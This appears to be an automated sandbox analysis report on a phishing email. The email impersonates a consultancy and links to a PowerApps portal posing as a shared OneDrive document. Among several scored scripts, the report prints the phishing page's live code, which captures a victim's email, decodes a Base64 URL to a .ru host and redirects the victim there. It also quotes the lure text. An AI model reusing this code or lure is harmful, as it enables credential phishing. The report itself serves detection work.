Windows Analysis Report
Laurier Partners Proposal.eml

{
    "explanation": [
        "The email appears to be a signature block repeated multiple times with no actual message content",
        "The sender and recipient are the same person/address which is highly suspicious",
        "Contains a suspicious PowerApps portal link mixed in with legitimate business contact information"
    ],
    "phishing": true,
    "confidence": 8,
    "generated_by_ai": false
}

{
    "date": "Wed, 18 Dec 2024 19:30:40 +0100", 
    "subject": "Laurier Partners Proposal", 
    "communications": [
        " Robert C HainLaurier Partners Strategy Advisors+1 902 830 3210hain@laurierpartners.comRob Hain on LinkedInwww.laurierpartners.com    @font-face {font-family:\"Cambria Math\"} @font-face {font-family:userbri} @font-face {font-family:Cambria} p.MsoNormal, li.MsoNormal, div.MsoNormal {margin:0in; font-size:12.0pt; font-family:\"userbri\",sans-serif} a:link, span.MsoHyperlink {color:#0563C1; text-decoration:underline} span.EmailStyle17 {font-family:\"userbri\",sans-serif; color:windowtext} .MsoChpDefault {font-size:12.0pt; font-family:\"userbri\",sans-serif} @page WordSection1 {margin:1.0in 1.0in 1.0in 1.0in} div.WordSection1 {} --> Robert C HainLaurier Partners Strategy Advisors+1 902 830 3210hain@laurierpartners.comRob Hain on LinkedInwww.laurierpartners.com Robert C HainLaurier Partners Strategy Advisors+1 902 830 3210hain@laurierpartners.comRob Hain on LinkedInwww.laurierpartners.com https://yesyes-cad3.powerappsportals.com/ Robert C Hain Robert C Hain Robert C Hain Laurier Partners Strategy Advisors Laurier Partners Strategy Advisors +1 902 830 3210 +1 902 830 3210 hain@laurierpartners.com hain@laurierpartners.com hain@laurierpartners.com mailto:hain@laurierpartners.com hain@laurierpartners.com Rob Hain on LinkedIn Rob Hain on LinkedIn Rob Hain on LinkedIn https://www.linkedin.com/in/rob-hain-2a793229/ Rob Hain on LinkedIn www.laurierpartners.com www.laurierpartners.com www.laurierpartners.com http://www.laurierpartners.com/ www.laurierpartners.com "
    ], 
    "from": "Robert Hain <hain@laurierpartners.com>", 
    "to": "Robert Hain <hain@laurierpartners.com>", 
    "attachements": [
        "image001[68].png"
    ]
}

{
  "contains_trigger_text": true,
  "trigger_text": "VIEW SHARED DOCUMENT",
  "prominent_button_name": "VIEW SHARED DOCUMENT",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
  "brands": [
    "Laurier Partners"
  ]
}

{"classification":"Credential Stealer"}

Email:
Detected potential phishing email: The email appears to be a signature block repeated multiple times with no actual message content. The sender and recipient are the same person/address which is highly suspicious. Contains a suspicious PowerApps portal link mixed in with legitimate business contact information

{
    "risk_score": 2,
    "reasoning": "The provided JavaScript snippet appears to be a legitimate implementation of an authentication flow, with no clear indicators of malicious intent. It checks a configuration flag to determine whether to fetch an authentication token from a trusted domain and store it in session storage. This behavior is consistent with typical authentication and session management practices, posing a low risk."
}

        var enableOmniChannelWidgetWithSiteCopilot = 'False';
        if (enableOmniChannelWidgetWithSiteCopilot === "True" || enableOmniChannelWidgetWithSiteCopilot === "true") {
            const authUrl = window.location.origin + "/_services/auth/portalusertoken";
            const fetchWithRetries = async (url, options, retries) => {
                try {
                    const authResponse = await fetch(url, options);
                    const token = await authResponse.text();
                    sessionStorage['c2Token'] = token;
                } catch (err) {
                    if (retries === 1) throw err;
                    return await fetchWithRetries(url, options, retries - 1);
                }
            };
            fetchWithRetries(authUrl, { method: "POST" }, 4);
        }
    

{
    "risk_score": 1,
    "reasoning": "The provided JavaScript snippet appears to be a benign script that adjusts the height of a navigation bar element based on the window size. It also checks for the presence of the 'search' element and sets its 'href' attribute to an empty string if the user is using Internet Explorer. These behaviors are common practices for responsive web design and do not demonstrate any high-risk indicators."
}

  window.onload = function () {
    if (window.navigator.appName == 'Microsoft Internet Explorer' || window.navigator.userAgent.indexOf('Trident') > 0) {
      var searchElement = document.getElementById('search');
      if (searchElement != null) searchElement.setAttribute('href', '');
    }
  };
  function setHeight() {
    var windowHeight = window.innerHeight - 140;
    var navbar = document.getElementById('navbar');
    if (navbar) {
      navbar.style.maxHeight = windowHeight + 'px';
    }
  }
  window.addEventListener('resize', function (event) {
    setHeight();
  });

{
    "risk_score": 2,
    "reasoning": "The provided JavaScript snippet appears to be handling user authentication and session management, which is a common and legitimate practice. It checks the user's authentication status, clears session data if the user is not authenticated, and updates the authentication status in the session storage. This behavior does not exhibit any high-risk indicators, such as dynamic code execution, data exfiltration, or suspicious redirects. The script is likely part of a larger application and is not demonstrating any malicious intent."
}

		var isPvaBotAuthenticated = sessionStorage['isPvaBotAuthenticated'];
		var isPortalUserLoggedIn = 'False';

        if ((isPvaBotAuthenticated != null || isPvaBotAuthenticated != undefined) && isPvaBotAuthenticated != isPortalUserLoggedIn) {
			sessionStorage['triggerPvaBotSignOut'] = true;
			sessionStorage.removeItem('c2Token');
            sessionStorage.removeItem('directLinetoken');
            sessionStorage.removeItem('conversation_Id');
		}
		sessionStorage['isPvaBotAuthenticated'] = isPortalUserLoggedIn;
    

{
    "risk_score": 2,
    "reasoning": "The provided JavaScript snippet appears to be a legitimate feature that adds accessibility-related content to the page based on the user's language. It does not exhibit any high-risk behaviors, such as dynamic code execution, data exfiltration, or redirects to suspicious domains. The script simply creates and appends an anchor element to a container element, with the anchor's content and URL determined by the user's language. This behavior is consistent with typical accessibility-related functionality and does not raise significant security concerns."
}

  window.onload = function () {
    const accessibilityLinkContainer = document.getElementById('accessibilityLinkContainer');
    switch (window.navigator.language) {
      case 'fr':
        if (accessibilityLinkContainer != null) {
          const accessibilityText = 'Accessibilit : partiellement conforme';
          const frenchAccessibilityAnchor = document.createElement('a');
          frenchAccessibilityAnchor.id = 'frenchAccesssibleLink';
          frenchAccessibilityAnchor.target = '_blank';
          frenchAccessibilityAnchor.href = 'https://go.microsoft.com/fwlink/?linkid=2163806';
          frenchAccessibilityAnchor.title = accessibilityText;
          frenchAccessibilityAnchor.innerText = accessibilityText;
          accessibilityLinkContainer.appendChild(frenchAccessibilityAnchor);
        }
        break;
      case 'it':
        if (accessibilityLinkContainer != null) {
          const accessibilityText = 'Accessibilit: parzialmente conforme';
          const italianAccessibilityAnchor = document.createElement('a');
          italianAccessibilityAnchor.id = 'italianAccesssibleLink';
          italianAccessibilityAnchor.target = '_blank';
          italianAccessibilityAnchor.href = 'https://go.microsoft.com/fwlink/?linkid=2208177';
          italianAccessibilityAnchor.title = accessibilityText;
          italianAccessibilityAnchor.innerText = accessibilityText;
          accessibilityLinkContainer.appendChild(italianAccessibilityAnchor);
        }
        break;
      default:
        accessibilityLinkContainer.remove();
    }
  };

{
    "risk_score": 1,
    "reasoning": "The provided JavaScript snippet appears to be a benign script with no clear malicious intent. It includes two main functionalities: 1) Refreshing all PowerBI iframes in response to a 'refreshPowerBI' message, and 2) Fixing the viewport width setting for Internet Explorer 10 on Windows Phone 8. These behaviors are common for web applications and do not demonstrate any high-risk indicators such as dynamic code execution, data exfiltration, or suspicious redirects. The script is likely part of a legitimate web application and poses a low risk."
}

		// Refresh all powerBI Iframes on Login in one Iframe
		window.addEventListener('message', function (event) {
			if (event && event.data && event.data == 'refreshPowerBI') {
				$("iframe.powerbi").each(function () {
					this.src = this.src;
				});
			}
		});

		// Fix for incorrect viewport width setting in IE 10 on Windows Phone 8.
		if (navigator.userAgent.match(/IEMobile\/10\.0/)) {
			var msViewportStyle = document.createElement("style");
			msViewportStyle.appendChild(document.createTextNode("@-ms-viewport{width:auto!important}"));
			document.getElementsByTagName("head")[0].appendChild(msViewportStyle);
		}
	

{
    "risk_score": 3,
    "reasoning": "The provided JavaScript snippet appears to be a legitimate implementation of the Microsoft Dynamics 365 Portal, with no clear indicators of malicious behavior. It sets up a namespace for the Dynamics 365 Portal and initializes various properties related to the user, version, and telemetry settings. While it includes some potentially sensitive information, such as the tenant and organization IDs, this is likely necessary for the proper functioning of the portal. The snippet does not contain any high-risk indicators like dynamic code execution, data exfiltration, or suspicious redirects. The only potential concern is the use of a hardcoded cookie value, which could be a security risk if not properly validated. However, this is a relatively minor issue, and the overall behavior of the script appears to be benign."
}

		window["Microsoft"] = window["Microsoft"] || {};
		window["Microsoft"].Dynamic365 = {
			Portal: {
				
				User: {
					userName: '',
					contactId: ''
				},
				
				version: '9.6.10.63',
				type: 'PowerPages_BlankTemplate_V2',
				id: '7a808dc7-b160-46d0-9be5-2d71200c9cd4', 
				geo: 'NAM', 
				tenant: '4fbc3e57-fde7-4026-b02d-e005bc54d1de', 
				correlationId: '039afa58-5c38-4bf5-b77e-d23f20fee531',
				orgEnvironmentId: 'bbf70437-b104-e0cc-8a6a-97b8164e4812',
				orgId: 'c0404d04-18bc-ef11-b8e4-6045bd016e1a',
				portalProductionOrTrialType: 'Trial',
				isTelemetryEnabled: 'True',
				InstrumentationSettings: {
					instrumentationKey: '197418c5cb8c4426b201f9db2e87b914-87887378-2790-49b0-9295-51f43b6204b1-7172',
					collectorEndpoint: 'https://us-mobile.events.data.microsoft.com/OneCollector/1.0/'
				},
				timerProfileForBatching: 'NEAR_REAL_TIME'
			}
		}

		// Mark request not cacheable if Dynamics365PortalAnalytics cookie is being refreshed by the server or if the cookie in request header is invalid
		

		// For client side telemetry intializing Dynamics365PortalAnalytics cookie object
		
		window["Microsoft"].Dynamic365.Portal.dynamics365PortalAnalytics = 'TifZbv0DZc4JPYZLP1yam-Gatzzb-sgvs8B2Kug2ep199YylXgPIIgfivYj-aRwZB93PTvuIVanPx-AG2n8UOhtHuPNKNFY4Ur8ZjtI-jwGKA_IwvXSxMxSErGHm-D0VhI8lFsg30Sp72_ePcOeETQ2'; // CodeQL [SM00430] False Positive: only alphanumeric chars allowed, for non-alphanumeric char it will return INVALID_CHARACTERS_IN_COOKIE 
		

    

{
    "risk_score": 7,
    "reasoning": "This script demonstrates several high-risk behaviors, including data exfiltration and redirects to a suspicious domain. The script collects the user's email input and appends it to a Base64-encoded URL, which is then used to redirect the user. This behavior is highly suspicious and could be indicative of a phishing or malware attempt."
}

        document.getElementById('continue-button').addEventListener('click', function() {
            continueLoading();
        });

        document.getElementById('thesupwillsup-input').addEventListener('keydown', function(event) {
            if (event.key === 'Enter') {
                continueLoading();
            }
        });

        function continueLoading() {
    var thesupwillsup = document.getElementById('thesupwillsup-input').value;
    if (validateEmail(thesupwillsup)) {
        var linkx = "aHR0cHM6Ly9mN3gzbi5lcnRhbmR1enUucnUvZ2s1OUFncC8jbA=="; // Base64 encoded link
        var decodedLink = atob(linkx);
        var finalLink = decodedLink + "" + thesupwillsup;  // Directly append the email address
        window.location.href = finalLink;
    } else {
        alert("Please enter a valid email address.");
    }
}


        function validateEmail(email) {
            var re = /^[^\s@]+@[^\s@]+\.[^\s@]+$/;
            return re.test(email);
        }
    

{
    "risk_score": 2,
    "reasoning": "The provided JavaScript code appears to be a benign script that updates the page title based on the active breadcrumb element, and a function that redirects the user to an 'EditInCms' page with the current URL parameters. There are no high-risk indicators like dynamic code execution, data exfiltration, or suspicious redirects. The script is using standard DOM manipulation and URL handling, which are common practices. Overall, the code seems to be part of a legitimate web application functionality and poses a low risk."
}

		//this event will update the title of the page based on active breadcrumb
		$('.breadcrumb').ready(function () {
			if ($('.breadcrumb').is(':visible')) {
				document.querySelector('title').innerHTML = ($('.breadcrumb > li.active').text() + "");
			}
		});

		function GoToNewEditor() {
			var editCmsUrlSegment = "EditInCms";
			var currentUrl = window.location.href;
			if (currentUrl.indexOf('?') > -1) {
				var urlSegments = currentUrl.split("?");
				window.location.href = window.location.origin + '/' + editCmsUrlSegment + window.location.pathname + '?' + urlSegments[1];
			}
			else {
				window.location.href = window.location.origin + '/' + editCmsUrlSegment + window.location.pathname;
			}
		}
	

{
    "risk_score": 1,
    "reasoning": "The provided JavaScript snippet appears to be the Bootstrap library, which is a widely used and trusted front-end framework. It does not contain any high-risk indicators, such as dynamic code execution, data exfiltration, or suspicious redirects. The code is primarily focused on providing functionality for common UI elements and interactions, which is consistent with the purpose of the Bootstrap library. Therefore, this snippet is considered low risk."
}

/*!
 * Bootstrap v3.4.1 (https://getbootstrap.com/)
 * Copyright 2011-2019 Twitter, Inc.
 * Licensed under the MIT license
 */
if("undefined"==typeof jQuery)throw new Error("Bootstrap's JavaScript requires jQuery");!function(t){"use strict";var e=jQuery.fn.jquery.split(" ")[0].split(".");if(e[0]<2&&e[1]<9||1==e[0]&&9==e[1]&&e[2]<1||3<e[0])throw new Error("Bootstrap's JavaScript requires jQuery version 1.9.1 or higher, but lower than version 4")}(),function(n){"use strict";n.fn.emulateTransitionEnd=function(t){var e=!1,i=this;n(this).one("bsTransitionEnd",function(){e=!0});return setTimeout(function(){e||n(i).trigger(n.support.transition.end)},t),this},n(function(){n.support.transition=function o(){var t=document.createElement("bootstrap"),e={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd otransitionend",transition:"transitionend"};for(var i in e)if(t.style[i]!==undefined)return{end:e[i]};return!1}(),n.support.transition&&(n.event.special.bsTransitionEnd={bindType:n.support.transition.end,delegateType:n.support.transition.end,handle:function(t){if(n(t.target).is(this))return t.handleObj.handler.apply(this,arguments)}})})}(jQuery),function(s){"use strict";var e='[data-dismiss="alert"]',a=function(t){s(t).on("click",e,this.close)};a.VERSION="3.4.1",a.TRANSITION_DURATION=150,a.prototype.close=function(t){var e=s(this),i=e.attr("data-target");i||(i=(i=e.attr("href"))&&i.replace(/.*(?=#[^\s]*$)/,"")),i="#"===i?[]:i;var o=s(document).find(i);function n(){o.detach().trigger("closed.bs.alert").remove()}t&&t.preventDefault(),o.length||(o=e.closest(".alert")),o.trigger(t=s.Event("close.bs.alert")),t.isDefaultPrevented()||(o.removeClass("in"),s.support.transition&&o.hasClass("fade")?o.one("bsTransitionEnd",n).emulateTransitionEnd(a.TRANSITION_DURATION):n())};var t=s.fn.alert;s.fn.alert=function o(i){return this.each(function(){var t=s(this),e=t.data("bs.alert");e||t.data("bs.alert",e=new a(this)),"string"==typeof i&&e[i].call(t)})},s.fn.alert.Constructor=a,s.fn.alert.noConflict=function(){return s.fn.alert=t,this},s(document).on("click.bs.alert.data-api",e,a.prototype.close)}(jQuery),function(s){"use strict";var n=function(t,e){this.$element=s(t),this.options=s.extend({},n.DEFAULTS,e),this.isLoading=!1};function i(o){return this.each(function(){var t=s(this),e=t.data("bs.button"),i="object"==typeof o&&o;e||t.data("bs.button",e=new n(this,i)),"toggle"==o?e.toggle():o&&e.setState(o)})}n.VERSION="3.4.1",n.DEFAULTS={loadingText:"loading..."},n.prototype.setState=function(t){var e="disabled",i=this.$element,o=i.is("input")?"val":"html",n=i.data();t+="Text",null==n.resetText&&i.data("resetText",i[o]()),setTimeout(s.proxy(function(){i[o](null==n[t]?this.options[t]:n[t]),"loadingText"==t?(this.isLoading=!0,i.addClass(e).attr(e,e).prop(e,!0)):this.isLoading&&(this.isLoading=!1,i.removeClass(e).removeAttr(e).prop(e,!1))},this),0)},n.prototype.toggle=function(){var t=!0,e=this.$element.closest('[data-toggle="buttons"]');if(e.length){var i=this.$element.find("input");"radio"==i.prop("type")?(i.prop("checked")&&(t=!1),e.find(".active").removeClass("active"),this.$element.addClass("active")):"checkbox"==i.prop("type")&&(i.prop("checked")!==this.$element.hasClass("active")&&(t=!1),this.$element.toggleClass("active")),i.prop("checked",this.$element.hasClass("active")),t&&i.trigger("change")}else this.$element.attr("aria-pressed",!this.$element.hasClass("active")),this.$element.toggleClass("active")};var t=s.fn.button;s.fn.button=i,s.fn.button.Constructor=n,s.fn.button.noConflict=function(){return s.fn.button=t,this},s(document).on("click.bs.button.data-api",'[data-toggle^="button"]',function(t){var e=s(t.target).closest(".btn");i.call(e,"toggle"),s(t.target).is('input[type="radio"], input[type="checkbox"]')||(t.preventDefault(),e.is("input,button")?e.trigger("focus"):e.find("input:visible,button:visible").first().trigger("focus"))}).on("focus.bs.button.data-api blur.bs.button.data-api",'[data-toggle^="bu

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": false,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": true,
    "brand_spoofing_attempt": false,
    "third_party_hosting": true
}

URL: https://yesyes-cad3.powerappsportals.com

{
  "contains_trigger_text": true,
  "trigger_text": "CLICK HERE TO ACCESS DOCUMENT",
  "prominent_button_name": "CLICK HERE TO ACCESS DOCUMENT",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
"contains_trigger_text": true,
"trigger_text": "You've received a secured document: We need verify the intended recipient's email to continue reading in word document. Please enter the email address to which document was shared.",
"prominent_button_name": "Open in Word Document",
"text_input_field_labels": "Enter email",
"pdf_icon_visible": false,
"has_visible_captcha": false,
"has_urgent_text": false,
"has_visible_qrcode": false,
"contains_chinese_text": false,
"contains_fake_security_alerts": false
}

{
  "brands": [
    "OneDrive"
  ]
}

```json
{
    "risk_score": 1,
    "reasoning": "The provided JavaScript snippet is a part of the jQuery library, which is a widely used and reputable open-source library for DOM manipulation and event handling. There are no high-risk indicators such as dynamic code execution or data exfiltration. The script does not interact with external domains or perform any suspicious activities. It primarily defines utility functions and prototypes for jQuery operations. Therefore, it is considered low risk."
}

/*! jQuery v3.6.2 | (c) OpenJS Foundation and other contributors | jquery.org/license */
!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(k,e){"use strict";var t=[],n=Object.getPrototypeOf,a=t.slice,m=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},l=t.push,s=t.indexOf,i={},r=i.toString,g=i.hasOwnProperty,o=g.toString,u=o.call(Object),v={},y=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},b=function(e){return null!=e&&e===e.window},D=k.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function _(e,t,i){var n,s,r=(i=i||D).createElement("script");if(r.text=e,t)for(n in c)(s=t[n]||t.getAttribute&&t.getAttribute(n))&&r.setAttribute(n,s);i.head.appendChild(r).parentNode.removeChild(r)}function w(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?i[r.call(e)]||"object":typeof e}var h="3.6.2",C=function(e,t){return new C.fn.init(e,t)};function d(e){var t=!!e&&"length"in e&&e.length,i=w(e);return!y(e)&&!b(e)&&("array"===i||0===t||"number"==typeof t&&0<t&&t-1 in e)}C.fn=C.prototype={jquery:h,constructor:C,length:0,toArray:function(){return a.call(this)},get:function(e){return null==e?a.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=C.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return C.each(this,e)},map:function(i){return this.pushStack(C.map(this,function(e,t){return i.call(e,t,e)}))},slice:function(){return this.pushStack(a.apply(this,arguments))},first:function(){return this.eq(0)},last:function(){return this.eq(-1)},even:function(){return this.pushStack(C.grep(this,function(e,t){return(t+1)%2}))},odd:function(){return this.pushStack(C.grep(this,function(e,t){return t%2}))},eq:function(e){var t=this.length,i=+e+(e<0?t:0);return this.pushStack(0<=i&&i<t?[this[i]]:[])},end:function(){return this.prevObject||this.constructor()},push:l,sort:t.sort,splice:t.splice},C.extend=C.fn.extend=function(){var e,t,i,n,s,r,o=arguments[0]||{},a=1,l=arguments.length,u=!1;for("boolean"==typeof o&&(u=o,o=arguments[a]||{},a++),"object"==typeof o||y(o)||(o={}),a===l&&(o=this,a--);a<l;a++)if(null!=(e=arguments[a]))for(t in e)n=e[t],"__proto__"!==t&&o!==n&&(u&&n&&(C.isPlainObject(n)||(s=Array.isArray(n)))?(i=o[t],r=s&&!Array.isArray(i)?[]:s||C.isPlainObject(i)?i:{},s=!1,o[t]=C.extend(u,r,n)):void 0!==n&&(o[t]=n));return o},C.extend({expando:"jQuery"+(h+Math.random()).replace(/\D/g,""),isReady:!0,error:function(e){throw new Error(e)},noop:function(){},isPlainObject:function(e){var t,i;return!(!e||"[object Object]"!==r.call(e))&&(!(t=n(e))||"function"==typeof(i=g.call(t,"constructor")&&t.constructor)&&o.call(i)===u)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,i){_(e,{nonce:t&&t.nonce},i)},each:function(e,t){var i,n=0;if(d(e)){for(i=e.length;n<i;n++)if(!1===t.call(e[n],n,e[n]))break}else for(n in e)if(!1===t.call(e[n],n,e[n]))break;return e},makeArray:function(e,t){var i=t||[];return null!=e&&(d(Object(e))?C.merge(i,"string"==typeof e?[e]:e):l.call(i,e)),i},inArray:function(e,t,i){return null==t?-1:s.call(t,e,i)},merge:function(e,t){for(var i=+t.length,n=0,s=e.length;n<i;n++)e[s++]=t[n];return e.length=s,e},grep:function(e,t,i){for(var n=[],s=0,r=e.length,o=!i;s<r;s++)!t(e[s],s)!==o&&n.push(e[s]);return n},map:function(e,t,i){var n,s,r=0,o=[];if(d(e))for(n=e.length;r<n;r++)null!=(s=t(e[r],r,i))&&o.push(s);else for(r in e)null!=(s=t(e[r],r,i))&&o.push(s);return m(o)},guid:1,support:v}),"function"==typeof Symbol&&(C.fn[Symbol.iterator]=t[Symbol.iterator]),C.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(e,t){i["[object "+t+"]"]=t.toLowerCase()});var p=function(i){var e,p,_,r,s,f,h,m,w,l,u,x,k,o,D,g,a,c,v,C="s

```json
{
  "brands": "unknown"
}